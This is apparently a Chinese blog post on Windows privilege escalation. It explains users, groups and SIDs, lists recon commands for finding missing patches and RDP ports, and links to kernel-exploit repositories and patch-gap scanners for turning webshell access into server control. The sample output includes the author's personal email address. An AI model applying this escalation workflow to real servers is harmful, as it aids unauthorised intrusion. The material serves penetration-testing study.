{"id":793,"date":"2025-10-24T15:33:11","date_gmt":"2025-10-24T07:33:11","guid":{"rendered":"https:\/\/www.youvii.site\/?p=793"},"modified":"2025-10-24T15:33:11","modified_gmt":"2025-10-24T07:33:11","slug":"windowstiquan","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/windowstiquan","title":{"rendered":"Windows\u63d0\u6743"},"content":{"rendered":"

Windows\u63d0\u6743<\/h1>\n

\u57fa\u7840\u77e5\u8bc6<\/h1>\n

\u7528\u6237\u4e0e\u7528\u6237\u7ec4<\/h2>\n

\u5728windows\u4e0d\u7528\u7684\u7528\u6237\u6709\u7740\u4e0d\u540c\u7684\u6743\u9650\uff0c\u6743\u9650\u4e3b\u8981\u5305\u62ec\u6709\uff1a\u5b8c\u5168\u63a7\u5236\u3001\u4fee\u6539\u3001\u8bfb\u53d6\u548c\u6267\u884c\u3001\u5217\u51fa\u6587\u4ef6\u5939\u5185\u5bb9\u3001\u8bfb\u53d6\u3001\u5199\u5165\u3002<\/p>\n

\u800c\u8d85\u7ea7\u7ba1\u7406\u5458\u548csystem\u7528\u6237\u6743\u9650\u6700\u9ad8<\/p>\n

\u5185\u7f6e\u7528\u6237\uff1a<\/p>\n

Administrator\uff0c\u7cfb\u7edf\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u62e5\u6709\u5b8c\u5168\u63a7\u5236\u6743<\/p>\n

guest\uff0c\u6765\u5bbe\u8d26\u53f7\uff0c\u63d0\u4f9b\u8bbf\u95ee\u5171\u4eab\u8d44\u6e90\u7684\u7f51\u7edc\u7528\u6237\u4f7f\u7528\uff0c\u4ec5\u5177\u6709\u57fa\u672c\u6743\u9650\uff0c\u9ed8\u8ba4\u88ab\u7981\u7528<\/p>\n

\"1746583042610-8d59b90d-a51f-4b40-8a20-12200c619830.png\"<\/p>\n

net user \/\/\u67e5\u770b\u672c\u5730\u7528\u6237\nnet user administrator \/\/\u67e5\u770b\u7528\u6237\u8be6\u7ec6\u4fe1\u606f\nnet localgroup \/\/\u67e5\u770b\u7528\u6237\u7ec4<\/code><\/pre>\n
\u7528\u6237\u4e5f\u53ef\u4ee5\u5c5e\u4e8e\u591a\u4e2a\u7528\u6237\u7ec4\uff0c\u5e38\u89c1\u7684\u7528\u6237\u7ec4\u662f \u7ba1\u7406\u7ec4(Administrators)\u3001\u666e\u901a\u7528\u6237\u7ec4\uff08Users\uff09\u3001iis\u7528\u6237\u7ec4\uff08IIS_IUSRS\uff09\u3001\u6765\u5bbe\u7ec4\uff08Guests\uff09\u3001\u8fdc\u7a0b\u767b\u5f55\u7ec4\uff08Remote Desktop Users\uff09<\/p>\n
\u5185\u7f6e\u7528\u6237\u7ec4<\/p>\n
administrators\uff0c\u7ba1\u7406\u5458\u7ec4<\/p>\n
users\u7ec4\uff0c\u65b0\u5efa\u7528\u6237\u9ed8\u8ba4\u6240\u5c5e\u7684\u7ec4<\/p>\n
guests\u7ec4\uff0c\u6743\u9650\u6700\u4f4e<\/p>\n
iis_users\u7ec4 Internet \u4fe1\u606f\u670d\u52a1\u4f7f\u7528\u7684\u5185\u7f6e\u7ec4<\/p>\n
\u7528\u6237\u4fe1\u606f\u7684\u8be6\u7ec6\u89e3\u6790<\/h3>\n
whoami \u547d\u4ee4<\/h4>\n
C:UsersMSI-NB>whoami \/?\nWhoAmI \u6709\u4e09\u79cd\u4f7f\u7528\u65b9\u6cd5:\n\u8bed\u6cd5 1:\nWHOAMI [\/UPN | \/FQDN | \/LOGONID]\n\u8bed\u6cd5 2:\nWHOAMI { [\/USER] [\/GROUPS] [\/CLAIMS] [\/PRIV] } [\/FO format] [\/NH]\n\u8bed\u6cd5 3:\nWHOAMI \/ALL [\/FO format] [\/NH]\n\u63cf\u8ff0:\n\u8fd9\u4e2a\u5de5\u5177\u53ef\u4ee5\u7528\u6765\u83b7\u53d6\u672c\u5730\u7cfb\u7edf\u4e0a\u5f53\u524d\u7528\u6237(\u8bbf\u95ee\u4ee4\u724c)\u7684\u7528\u6237\u540d\u548c\u7ec4\u4fe1\u606f\uff0c\n\u4ee5\u53ca\u76f8\u5e94\u7684\u5b89\u5168\u6807\u8bc6\u7b26(SID)\u3001\u58f0\u660e\u3001\n\u672c\u5730\u7cfb\u7edf\u4e0a\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u3001\u767b\u5f55\u6807\u8bc6\u7b26(\u767b\u5f55 ID)\n\u4f8b\u5982\uff0c\u8c01\u662f\u5f53\u524d\u5df2\u767b\u5f55\u7684\u7528\u6237?\n\u683c\u5f0f(\u57df\u7528\u6237\u540d)\n  \u53c2\u6570\u5217\u8868:\n\/UPN \u7528\u7528\u6237\u4e3b\u4f53 (User Principal) \u683c\u5f0f\u663e\u793a\u7528\u6237\u540d\n      \u540d\u79f0 (UPN)\u683c\u5f0f\u3002\n\/FQDN \u7528\u5b8c\u5168\u5408\u683c\u7684 (Fully Qualified) \u683c\u5f0f\u663e\u793a\u7528\u6237\u540d\n      \u53ef\u5206\u8fa8\u540d\u79f0(FQDN) \u683c\u5f0f\u3002\n\/USER \u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u4fe1\u606f\u4ee5\u53ca\u5b89\u5168\u6807\u8bc6\u7b26 (SID)\u3002\n\/GROUPS \u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u7ec4\u6210\u5458\u4fe1\u606f\u3001\u5e10\u6237\u7c7b\u578b\u548c\u5b89\u5168\n      \u6807\u8bc6\u7b26 (SID) \u548c\u5c5e\u6027\u3002\n\/CLAIMS \u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u58f0\u660e\uff0c\n      \u5305\u62ec\u58f0\u660e\u540d\u79f0\u3001\u6807\u5fd7\u3001\u7c7b\u578b\u548c\u503c\u3002\n\/PRIV \u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u5b89\u5168\u7279\u6743\n\/LOGONID \u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u767b\u5f55 ID\u3002\n\/ALL \u663e\u793a\u5f53\u524d\u7528\u6237\u540d\u3001\u6240\u5c5e\u7684\u7ec4\n      \u4ee5\u53ca\u5b89\u5168\u7b49\u7ea7\n      \u5f53\u524d\u7528\u6237\u8bbf\u95ee\u4ee4\u724c\u7684\u6807\u8bc6\u7b26(SID)\u3001\n      \u58f0\u660e\u548c\u6743\u9650\u3002\n\/FO format \u6307\u5b9a\u8981\u663e\u793a\u7684\u8f93\u51fa\u683c\u5f0f\u3002\n      \u6709\u6548\u503c\u4e3a TABLE\u3001LIST\u3001CSV\u3002\n      \u5217\u6807\u9898\u672a\u4f7f\u7528 CSV\n      \u683c\u5f0f\u663e\u793a\u3002\u9ed8\u8ba4\u683c\u5f0f\u4e3a TABLE\u3002\n\/NH \u6307\u5b9a\u4e0d\u5e94\u5728\u8f93\u51fa\u4e2d\u663e\u793a\n      \u5217\u6807\u9898\u3002\u6b64\u53c2\u6570\u4ec5\u5bf9\n      TABLE \u548c CSV \u683c\u5f0f\u6709\u6548\u3002\n\/? \u663e\u793a\u6b64\u5e2e\u52a9\u6d88\u606f\nExamples:\nWHOAMI\nWHOAMI \/UPN\nWHOAMI \/FQDN\nWHOAMI \/LOGONID\nWHOAMI \/USER\nWHOAMI \/USER \/FO LIST\nWHOAMI \/USER \/FO CSV\nWHOAMI \/GROUPS\nWHOAMI \/GROUPS \/FO CSV \/NH\nWHOAMI \/CLAIMS\nWHOAMI \/CLAIMS \/FO LIST\nWHOAMI \/PRIV\nWHOAMI \/PRIV \/FO TABLE\nWHOAMI \/USER \/GROUPS\nWHOAMI \/USER \/GROUPS \/CLAIMS \/PRIV\nWHOAMI \/ALL\nWHOAMI \/ALL \/FO LIST\nWHOAMI \/ALL \/FO CSV \/NH\nWHOAMI \/?\n\nwhoami \/all\n\u7528\u6237\u4fe1\u606f\n----------------\n\n\u7528\u6237\u540d     SID\n========== ==============================================\nyuhui\u59a4\u5fbd S-1-5-21-3215083981-1206593990-2414868913-1001\n\n\u7ec4\u4fe1\u606f\n-----------------\n\n\u7ec4\u540d                                      \u7c7b\u578b   SID                                                                                                          \u5c5e\u6027\n========================================= ====== ============================================================================================================ ==========================================\nMandatory LabelHigh Mandatory Level      \u6807\u7b7e   S-1-16-12288                                                           \nEveryone                                  \u5df2\u77e5\u7ec4 S-1-1-0                                                                                                      \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITY\u672c\u5730\u5e10\u6237\u548c\u7ba1\u7406\u5458\u7ec4\u6210\u5458       \u5df2\u77e5\u7ec4 S-1-5-114                                                                                                    \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nYUHUIdocker-users                        \u522b\u540d   S-1-5-21-3215083981-1206593990-2414868913-1016                                                               \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nBUILTINAdministrators                    \u522b\u540d   S-1-5-32-544                                                                                                 \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4, \u7ec4\u7684\u6240\u6709\u8005\nBUILTINPerformance Log Users             \u522b\u540d   S-1-5-32-559                                                                                                 \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nBUILTINUsers                             \u522b\u540d   S-1-5-32-545                                                                                                 \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITYINTERACTIVE                  \u5df2\u77e5\u7ec4 S-1-5-4                                                                                                      \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nCONSOLE LOGON                             \u5df2\u77e5\u7ec4 S-1-2-1                                                                                                      \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITYAuthenticated Users          \u5df2\u77e5\u7ec4 S-1-5-11                                                                                                     \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITYThis Organization            \u5df2\u77e5\u7ec4 S-1-5-15                                                                                                     \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nMicrosoftAccountd13212772860@outlook.com \u7528\u6237   S-1-11-96-3623454863-58364-18864-2661722203-1597581903-336930228-3377250314-3475270767-1772155924-3986879320 \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITY\u672c\u5730\u5e10\u6237                     \u5df2\u77e5\u7ec4 S-1-5-113                                                                                                    \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nLOCAL                                     \u5df2\u77e5\u7ec4 S-1-2-0                                                                                                      \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\nNT AUTHORITY\u4e91\u5e10\u6237\u8eab\u4efd\u9a8c\u8bc1               \u5df2\u77e5\u7ec4 S-1-5-64-36                                                                                                  \u5fc5\u9700\u7684\u7ec4, \u542f\u7528\u4e8e\u9ed8\u8ba4, \u542f\u7528\u7684\u7ec4\n\n\u7279\u6743\u4fe1\u606f\n----------------------\n\n\u7279\u6743\u540d                                    \u63cf\u8ff0                               \u72b6\u6001\n========================================= ================================== ======\nSeAssignPrimaryTokenPrivilege             \u66ff\u6362\u4e00\u4e2a\u8fdb\u7a0b\u7ea7\u4ee4\u724c                 \u5df2\u7981\u7528\nSeIncreaseQuotaPrivilege                  \u4e3a\u8fdb\u7a0b\u8c03\u6574\u5185\u5b58\u914d\u989d                 \u5df2\u7981\u7528\nSeSecurityPrivilege                       \u7ba1\u7406\u5ba1\u6838\u548c\u5b89\u5168\u65e5\u5fd7                 \u5df2\u7981\u7528\nSeTakeOwnershipPrivilege                  \u53d6\u5f97\u6587\u4ef6\u6216\u5176\u4ed6\u5bf9\u8c61\u7684\u6240\u6709\u6743         \u5df2\u7981\u7528\nSeLoadDriverPrivilege                     \u52a0\u8f7d\u548c\u5378\u8f7d\u8bbe\u5907\u9a71\u52a8\u7a0b\u5e8f             \u5df2\u7981\u7528\nSeSystemProfilePrivilege                  \u914d\u7f6e\u6587\u4ef6\u7cfb\u7edf\u6027\u80fd                   \u5df2\u7981\u7528\nSeSystemtimePrivilege                     \u66f4\u6539\u7cfb\u7edf\u65f6\u95f4                       \u5df2\u7981\u7528\nSeProfileSingleProcessPrivilege           \u914d\u7f6e\u6587\u4ef6\u5355\u4e00\u8fdb\u7a0b                   \u5df2\u7981\u7528\nSeIncreaseBasePriorityPrivilege           \u63d0\u9ad8\u8ba1\u5212\u4f18\u5148\u7ea7                     \u5df2\u7981\u7528\nSeCreatePagefilePrivilege                 \u521b\u5efa\u4e00\u4e2a\u9875\u9762\u6587\u4ef6                   \u5df2\u7981\u7528\nSeBackupPrivilege                         \u5907\u4efd\u6587\u4ef6\u548c\u76ee\u5f55                     \u5df2\u7981\u7528\nSeRestorePrivilege                        \u8fd8\u539f\u6587\u4ef6\u548c\u76ee\u5f55                     \u5df2\u7981\u7528\nSeShutdownPrivilege                       \u5173\u95ed\u7cfb\u7edf                           \u5df2\u7981\u7528\nSeDebugPrivilege                          \u8c03\u8bd5\u7a0b\u5e8f                           \u5df2\u7981\u7528\nSeSystemEnvironmentPrivilege              \u4fee\u6539\u56fa\u4ef6\u73af\u5883\u503c                     \u5df2\u7981\u7528\nSeChangeNotifyPrivilege                   \u7ed5\u8fc7\u904d\u5386\u68c0\u67e5                       \u5df2\u542f\u7528\nSeRemoteShutdownPrivilege                 \u4ece\u8fdc\u7a0b\u7cfb\u7edf\u5f3a\u5236\u5173\u673a                 \u5df2\u7981\u7528\nSeUndockPrivilege                         \u4ece\u6269\u5c55\u575e\u4e0a\u53d6\u4e0b\u8ba1\u7b97\u673a               \u5df2\u7981\u7528\nSeManageVolumePrivilege                   \u6267\u884c\u5377\u7ef4\u62a4\u4efb\u52a1                     \u5df2\u7981\u7528\nSeImpersonatePrivilege                    \u8eab\u4efd\u9a8c\u8bc1\u540e\u6a21\u62df\u5ba2\u6237\u7aef               \u5df2\u542f\u7528\nSeCreateGlobalPrivilege                   \u521b\u5efa\u5168\u5c40\u5bf9\u8c61                       \u5df2\u542f\u7528\nSeIncreaseWorkingSetPrivilege             \u589e\u52a0\u8fdb\u7a0b\u5de5\u4f5c\u96c6                     \u5df2\u7981\u7528\nSeTimeZonePrivilege                       \u66f4\u6539\u65f6\u533a                           \u5df2\u7981\u7528\nSeCreateSymbolicLinkPrivilege             \u521b\u5efa\u7b26\u53f7\u94fe\u63a5                       \u5df2\u7981\u7528\nSeDelegateSessionUserImpersonatePrivilege \u83b7\u53d6\u540c\u4e00\u4f1a\u8bdd\u4e2d\u53e6\u4e00\u4e2a\u7528\u6237\u7684\u6a21\u62df\u4ee4\u724c \u5df2\u7981\u7528<\/code><\/pre>\n
Windows \u7684 sid<\/h1>\n
Windows \u5b89\u5168\u6027\u4f9d\u8d56\u4e8e\uff1a\u8bbf\u95ee\u4ee4\u724c\u3001SID\u3001\u5b89\u5168\u63cf\u8ff0\u7b26\u3001\u8bbf\u95ee\u63a7\u5236\u5217\u8868\u3001\u5bc6\u7801<\/p>\n
\n\u8bbf\u95ee\u4ee4\u724c<\/span><\/strong><\/summary>\n
\u8bbf\u95ee\u4ee4\u724c\u5728\u672c\u8d28\u4e0a\u5b9a\u4e49\u4e86\u4e24 \u4e0a\u201cP\u201d\uff1aPermissions\uff08\u6743\u9650\uff09\u548cPrivilege\uff08\u7279\u6743\uff09\u3002\u4e24\u8005\u533a\u522b\u5e76\u4e0d\u660e\u663e\u3002\u8bbf\u95ee\u4ee4\u724c\u7684\u5185\u5bb9\u548c\u529f\u80fd\u7531\u7528\u6237\u7684SID\u3001\u7ec4\u7684SID\u3001\u767b\u5f55 SID\u3001\u7528\u6237\u7279\u6743\u3001\u9ed8\u8ba4\u6240\u6709\u8005\u3001SID\u3001\u9ed8\u8ba4\u7ec4SID\u3001\u9ed8\u8ba4DACL\u3001\u8d77\u6e90\u8fdb\u7a0b\u3001\u4ee4\u724c\u7c7b\u578b\u3001\u6a21\u62df\u7ea7\u522b\u3001\u53d7\u9650SID\u3002<\/span><\/p>\n<\/details>\n
\n\u6743\u9650<\/span><\/strong><\/summary>\n
\u4e00\u4e2a\u7528\u6237\u8fdb\u7a0b\u5728\u63a5\u89e6\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u201c\u5b89\u5168\u6027\u53c2\u8003\u76d1\u89c6\u5668\u201d\u5c06\u8bbf\u95ee\u4ee4\u724c\u4e2d\u7684SID\u4e0e\u201c\u5bf9\u8c61\u8bbf\u95ee\u63a7\u5236\u5217\u8868\uff08ACL\uff09\u201d\u4e2d\u7684SID\u5339\u914d\u3002\u53ef\u80fd\u51fa\u73b0\u7684\u4e24\u79cd\u60c5 \u51b5\uff1a1.\u5982\u679c\u6ca1\u6709\u5339\u914d\uff0c\u5c31\u62d2\u7edd\u7528\u6237\u8bbf\u95ee\uff0c\u8fd9\u79f0\u4e3a\u201c\u9690\u5f0f\u62d2\u7edd\uff08implici deny\uff09\u201d;2.\u5982\u679c\u6709\u4e00\u4e2a\u533a\u914d\uff0c\u5c31\u5c06\u4e0eACK\u4e2d\u7684\u6761\u76ee\u5173\u8054\u7684\u6743\u9650\u6388\u4e88\u7ed9\u7528\u6237\u3002\u8fd9\u53ef\u80fd\u662fAllow,\u4e5f\u53ef\u80fd\u662f\u4e00\u4e2aDeny\u6743\u9650\u3002\u5728\u4e24\u4e2a\u6743\u9650\u90fd\u76f4\u63a5\u6307\u6d3e\u7ed9 \u5bf9\u8c61\u7684\u524d\u63d0\u4e0b\uff0cDeny\u6743\u9650\u5c06\u4f18\u5148\u4e8eAllow\u6743\u9650\uff08\u5728\u5bf9\u5f85\u7ee7\u627f\u7684\u6743\u9650\u65f6\uff0c\u91c7\u53d6\u7684\u65b9\u5f0f\u7a0d\u6709\u4e0d\u540c\uff09<\/span><\/p>\n<\/details>\n
\nSID<\/span><\/strong><\/summary>\n
\u4e00\u4e2a\u5178\u578b\u7684SID\uff1aS\uff0d1-5-21-1683771068-12213551888-624655398-1001.\u5b83\u9075\u5faa\u7684\u6a21\u5f0f\u662f\uff1aS\uff0dR\uff0dIA\uff0dSA\uff0dSA\uff0dRID\u3002\u4e0b\u9762\u662f\u5177\u4f53\u89e3\u91ca\uff1a<\/span><\/p>\n
1\u3001\u5b57\u6bcdS\u6307\u660e\u8fd9\u662f\u4e00\u4e2aSID\u6807\u8bc6\u7b26\uff0c\u5b83\u5c06\u6570\u5b57\u6807\u8bb0\u4e3a\u4e00\u4e2aSID\u3002<\/span><\/p>\n
2\u3001R\u4ee3\u8868Revision\uff08\u4fee\u8ba2\uff09\uff0cWindows\u751f\u6210\u7684\u6240\u6709SID\u90fd\u4f7f\u7528\u4fee\u8ba2\u7ea7\u522b 1.<\/span><\/p>\n
3\u3001IA\u4ee3\u8868\u9881\u53d1\u673a\u6784\u3002\u5728Widnwos\u4e2d\uff0c\u51e0\u4e4e\u6240\u6709SID\u90fd\u6307\u5b9aNT\u673a\u6784\u4f5c\u4e3a\u9881\u53d1\u673a\u6784\uff0c\u5b83\u7684ID\u7f16\u53f7\u4e3a5.\u4f46\u662f\uff0c\u4ee3\u8868\u5df2\u77e5\u7ec4\u548c\u8d26\u6237\u7684SID\u4f8b\u5916\u3002<\/span><\/p>\n
4\u3001SA\u4ee3\u8868\u4e00\u4e2a\u5b50\u673a\u6784\u3002SA\u6307\u5b9a\u7279\u6b8a\u7684\u7ec4\u6216\u804c\u80fd\u3002\u4f8b\u5982\u300121\u8868\u660eSID\u7531\u4e00\u4e2a\u57df\u63a7\u5236\u5668\u6216\u8005\u4e00\u53f0\u5355\u673a\u9881\u53d1\u3002\u968f\u540e\u7684\u4e00\u957f\u4e32\u6570\u5b57\uff081683771068-12213551888-624655398\uff09\u5c31\u662f\u9881\u53d1SID\u7684\u90a3\u4e2a\u57df\u6216\u673a\u5668\u7684SA\u3002<\/span><\/p>\n
5\u3001RID\u662f\u6307\u76f8\u5bf9ID\uff08RID\uff09\u3001\u662fSA\u6240\u6307\u6d3e\u7684\u4e00\u4e2a\u60df\u4e00\u7684\u3001\u987a\u5e8f\u7684\u7f16\u53f7\u3001\u4ee3\u8868\u4e00\u4e2a\u5b89\u5168\u4e3b\u4f53\uff08\u6bd4\u5982\u4e00\u4e2a\u7528\u6237\u3001\u8ba1\u7b97\u673a\u6216\u7ec4\uff09<\/span><\/p>\n
\u65b0\u7684\u5df2\u77e5SID\uff1a\u5728\u7ecf\u5178NT\u548cwindows2000\u4e2d\uff0cLocal System\u8d26\u6237SID S\uff0d1-5-18\u4e3a\u51e0\u4e4e\u6240\u6709\u670d\u52a1\u63d0\u4f9b\u4e86\u5b89\u5168\u4e0a\u4e0b\u6587\uff0c\u8be5\u8d26\u6237\u5177\u6709\u5f88\u5927\u7684\u7279\u6743\u3002Windows2003\u5219\u5f15\u5165\u4e86\u53e6\u5916\u4e24\u4e2a\u201c\u5df2\u77e5SID\u201d\u6765\u4e3a\u670d\u52a1\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0a \u4e0b\u6587\u3001\u5373LocalService \u548c NetworkService\u90e8\u5206\u5df2\u77e5SID\u53ca\u529f\u80fd\u89c1Microsoft KB243330<\/span><\/p>\n
\u5df2 \u77e5RID\uff1a\u6307\u6d3e\u7ed9\u7528\u6237\u3001\u8ba1\u7b97\u673a\u548c\u7ec4\u7684RID\u4ece1000\u5f00\u59cb\u3002500-999\u7684RID\u88ab\u4e13\u95e8\u4fdd\u7559\u8d77\u6765\u3001\u8868\u793a\u5728\u6bcf\u4e2aWindows\u8ba1\u7b97\u673a\u548c\u57df\u4e2d\u901a\u7528\u7684\u8d26\u6237\u548c \u7ec4\uff0c\u5b83\u4eec\u79f0\u4e3a\u201c\u5df2\u77e5RID\u201d\u6709\u4e9b\u5df2\u77e5RID\u4f1a\u9644\u52a0\u5230\u4e00\u4e2a\u57dfSID\u4e0a\uff0c\u4ece\u800c\u6784\u6210\u4e00\u4e2a\u60df\u4e00\u7684\u6807\u8bc6\u7b26\u3002\u53e6\u4e00\u4e9b\u5219\u9644\u52a0\u5230Builtin SID(S-1-5-32)\u4e0a\uff0c\u6307\u51fa\u5b83\u4eec\u662f\u53ef\u80fd\u5177\u6709\u7279\u6743\u7684Builtin\u8d26\u6237\uff0d\uff0d\u7279\u6743\u8981\u4e48\u662f\u786c\u7f16\u7801\u5230\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\uff0c\u8981\u4e48\u662f\u5728\u5b89\u5168\u6570\u636e\u5e93\u4e2d\u6307\u6d3e\u7684\u3002<\/span><\/p>\n<\/details>\n
\u6f0f\u6d1e\u63d0\u6743<\/h1>\n
\u63d0\u6743\u662f\u6307\u628a\u666e\u901a\u7528\u6237\u7684\u6743\u9650\u8fdb\u884c\u63d0\u5347\uff0c\u4e5f\u53eb\u7279\u6743\u63d0\u5347\uff0c\u5728\u6e17\u900f\u6d4b\u8bd5\u4e2d\uff0c\u901a\u8fc7\u662f\u5404\u79cd\u6f0f\u6d1e\u63d0\u5347webshell\u6743\u9650\u4ee5\u593a\u5f97\u670d\u52a1\u5668\u6743\u9650<\/p>\n
webshell\u7684\u6743\u9650\u6839\u636e\u4e0d\u540c\u7684\u4e2d\u95f4\u4ef6\u6743\u9650\u4e5f\u6709\u6240\u4e0d\u540c\uff0c\u5982\u6ca1\u7ecf\u8fc7\u7279\u6b8a\u8bbe\u7f6e\uff0cwebshell\u7684\u6743\u9650\u662f\u7ee7\u627f\u8be5\u4e2d\u95f4\u4ef6\u7684\u6743\u9650<\/p>\n
webshell\u7684\u9ed8\u8ba4\u6743\u9650 \u4ece\u56fe\u4e2d\u53ef\u4ee5\u770b\u5230webshell\u7684\u6743\u9650\u662fiis_users\u7ec4<\/p>\n
\"1746583764105-19ff0e57-20c7-491d-a4b9-e271f6fbcc2b.png\"<\/p>\n
\u63d0\u6743\u5e38\u7528\u65b9\u6cd5<\/h1>\n
\u4e3b\u8981\u5206\u4e3a\u6f0f\u6d1e\u63d0\u6743<\/strong>\u3001windwos\u7279\u6027\u63d0\u6743<\/strong>\u3001\u7b2c\u4e09\u65b9\u7ec4\u4ef6\u63d0\u6743<\/strong>\uff0c\u6570\u636e\u5e93\u63d0\u6743<\/strong> ftp\u63d0\u6743<\/strong><\/p>\n
\u63d0\u6743\u5e38\u7528\u547d\u4ee4<\/h2>\n
systeminfo | findstr OS #\u83b7\u53d6\u7cfb\u7edf\u7248\u672c\u4fe1\u606f\nsysteminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True  get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #\u68c0\u6d4b\u7cfb\u7edf\u8f6f\u4ef6\u5305\nhostname #\u83b7\u53d6\u4e3b\u673a\u540d\u79f0\nwhoami \/all #\u83b7\u53d6\u5f53\u524d\u7528\u6237\u7684\u8be6\u7ec6\u4fe1\u606f\nwhoami \/priv #\u663e\u793a\u5f53\u524d\u7528\u6237\u7684\u5b89\u5168\u7279\u6743\nnet start #\u67e5\u770b\u670d\u52a1\nquser or query user #\u83b7\u53d6\u5728\u7ebf\u7528\u6237\nnetstat -ano | findstr 3389 #\u83b7\u53d6rdp\u8fde\u63a5\u6765\u6e90IP\ndir c:programdata #\u5206\u6790\u5b89\u88c5\u6740\u8f6f\nwmic qfe get Caption,Description,HotFixID,InstalledOn #\u5217\u51fa\u5df2\u5b89\u88c5\u7684\u8865\u4e01\nREG query HKLMSYSTEMCurrentControlSetControlTerminal\"\n\"ServerWinStationsRDP-Tcp \/v PortNumber #\u83b7\u53d6\u8fdc\u7a0b\u7aef\u53e3\ntasklist \/svc | find \"TermService\" #\u83b7\u53d6\u670d\u52a1pid\nnetstat -ano |find \"pid\" #\u83b7\u53d6\u8fdc\u7a0b\u7aef\u53e3<\/code><\/pre>\n
Windows \u63d0\u6743\u8f85\u52a9\u811a\u672c<\/h2>\n
\u68c0\u6d4b\u7cfb\u7edf\u8865\u4e01\u811a\u672c https:\/\/github.com\/SecWiki\/windows-kernel-exploits\/tree\/master\/win-exp-suggester<\/a><\/p>\n
\u67e5\u770b\u8865\u4e01 https:\/\/github.com\/chroblert\/WindowsVulnScan<\/a><\/p>\n
windows \u5185\u6838\u63d0\u6743exp https:\/\/github.com\/SecWiki\/windows-kernel-exploits<\/a><\/p>\n
\u5728\u7ebf\u63d0\u6743\u5229\u7528\u67e5\u8be2 https:\/\/lolbas-project.github.io\/<\/a><\/p>\n
\u63d0\u6743\u8f85\u52a9\u7f51\u9875 (hacking8.com)<\/p>\n
windows\u6f0f\u6d1e\u63d0\u6743\u6d41\u7a0b<\/h2>\n
\u80fd\u591f\u6267\u884ccmd\u547d\u4ee4->\u662f\u5426\u6253\u8865\u4e01->\u8865\u4e01\u5bf9\u5e94exp->\u83b7\u53d6\u670d\u52a1\u5668\u6743\u9650<\/p>\n
\u6267\u884c\u547d\u4ee4\u7684\u65f6\u5019 aspx->php\u548casp<\/p>\n
\u5982\u679c\u7ba1\u7406\u5458\u5220\u9664\u670d\u52a1\u5668\u7ec4\u4ef6 wscript.shell \u65e0\u6cd5\u5728asp\u6267\u884ccmd\u547d\u4ee4 \u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528aspx\u7684\u540e\u95e8\u67e5\u770b\u662f<\/p>\n
\u5426\u6709\u6743\u9650\u6267\u884ccmd\u547d\u4ee4<\/p>\n
asp<\/p>\n
\"1746584458668-bf7a1a95-bdf7-4b7f-8abe-516c7c1f2a60.png\"<\/p>\n
aspx<\/p>\n
\"1746584469524-4922bf56-fade-4864-9c70-5616fd3a4bdc.png\"<\/p>\n
\u8865\u4e01\u67e5\u8be2<\/h2>\n
hacking8\u5728\u7ebf\u67e5\u8be2\u8865\u4e01<\/h3>\n
systeminfo > c:1.txt<\/p>\n
\"1746584493497-9dff240d-c6f8-4e9c-85e0-ff66fda4de5f.png\"<\/p>\n
wesng \u67e5\u8be2\u8865\u4e01<\/h3>\n
https:\/\/github.com\/bitsadmin\/wesng?clienttype=8&version=7.55.1.101&from=win32_yunguanjia&channel=00000000000000000000000040000001&privilege=&pri_extra=<\/a><\/p>\n
python wes.py –update-wes #\u66f4\u65b0<\/p>\n
pip3 install chardet #\u4e0b\u8f7d\u5305<\/p>\n
python wes.py c:sys.txt #\u68c0\u6d4b\u8865\u4e01<\/p>\n
WindowsVulnScan \u67e5\u8be2\u8865\u4e01<\/h3>\n
https:\/\/github.com\/chroblert\/WindowsVulnScan<\/a><\/p>\n
windows-exp-suggester<\/p>\n
\u8fd9\u6b3e\u548c\u672c\u5de5\u5177\u7684\u539f\u7406\u4e00\u6837\uff0c\u5c1d\u8bd5\u4f7f\u7528\u4e86\u4e4b\u540e\uff0c\u53d1\u73b0\u5b83\u7684CVEKB\u6570\u636e\u5e93\u53ea\u66f4\u65b0\u52302017\u5e74\u7684\uff0c\u5e76\u4e14\u6ca1\u6709\u7ed9\u51faCVE\u662f\u5426\u6709\u516c\u5f00\u7684EXP\u4fe1\u606f<\/p>\n
